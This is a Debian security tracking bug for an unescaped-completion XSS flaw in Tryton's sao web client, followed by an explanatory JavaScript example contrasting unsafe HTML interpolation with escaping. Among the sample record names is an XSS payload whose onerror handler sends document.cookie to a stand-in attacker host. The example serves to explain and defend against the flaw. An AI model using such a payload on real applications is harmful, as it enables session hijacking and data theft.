Source: tryton-sao
Version: 7.0.38+ds1-1
Severity: important
Tags: security upstream
Forwarded: https://foss.heptapod.net/tryton/tryton/-/issues/14363
X-Debbugs-Cc: [email protected], Debian Security Team <[email protected]>
Hi

Adding a tracking bug for https://discuss.tryton.org/t/security-release-for-issue-14363/8951

| Abdulfatah Abdillahi has found that sao does not escape the
| completion values. The content of completion is generally the record
| name which may be edited in many ways depending on the model. The
| content may include some JavaScript which is executed in the same
| context as sao which gives access to sensitive data such as the
| session.

https://foss.heptapod.net/tryton/tryton/-/issues/14363

Regards,
Salvatore
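The pattern the announcement describes, as an added illustration that is not part of this bug report and is not sao's own code: a completion list that drops record names straight into HTML, beside a version that escapes them first. The function names, the markup, and the sample record names (including the hostile one) are constructed for this example; the actual upstream fix is in the linked issue.

```javascript
// Illustrative example, not sao's code: rendering completion entries from
// record names that a user may have edited.

// Constructed sample record names, including one a malicious user might
// save into a record's name field.
const RECORD_NAMES = [
  'Acme Ltd',
  'Smith & Sons <Wholesale>',
  '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">',
];

// Vulnerable pattern: the record name is interpolated into markup as-is, so
// any HTML in it becomes part of the page and any event handler runs in the
// web client's origin, with access to its session.
function renderCompletionUnsafe(names) {
  return names.map((n) => `<li class="completion">${n}</li>`).join('\n');
}

// Minimal HTML escaper for text placed in an element body or a quoted
// attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened pattern: every untrusted value is escaped before concatenation,
// so the record name is displayed as text and cannot introduce markup.
function renderCompletionSafe(names) {
  return names.map((n) => `<li class="completion">${escapeHtml(n)}</li>`).join('\n');
}

// Check used by the demonstration: does the rendered HTML contain any tag
// other than the <li> wrapper the renderer itself emits?
function containsForeignTag(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some((t) => !/^<\/?li\b/.test(t));
}

// In a browser the equivalent of the hardened form is to build nodes and set
// textContent instead of assigning untrusted data to innerHTML. Takes the
// document as a parameter so the rest of the file runs under Node.
function renderCompletionDom(doc, names) {
  const ul = doc.createElement('ul');
  for (const n of names) {
    const li = doc.createElement('li');
    li.className = 'completion';
    li.textContent = n; // never innerHTML with untrusted data
    ul.appendChild(li);
  }
  return ul;
}

console.log('unsafe output contains injected tag:',
  containsForeignTag(renderCompletionUnsafe(RECORD_NAMES)));
console.log('safe output contains injected tag:',
  containsForeignTag(renderCompletionSafe(RECORD_NAMES)));
```

The escaping must happen at the point where the value meets the HTML, not when the record is saved: the announcement notes the record name may be edited in many ways depending on the model, so input-side filtering cannot be relied on.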

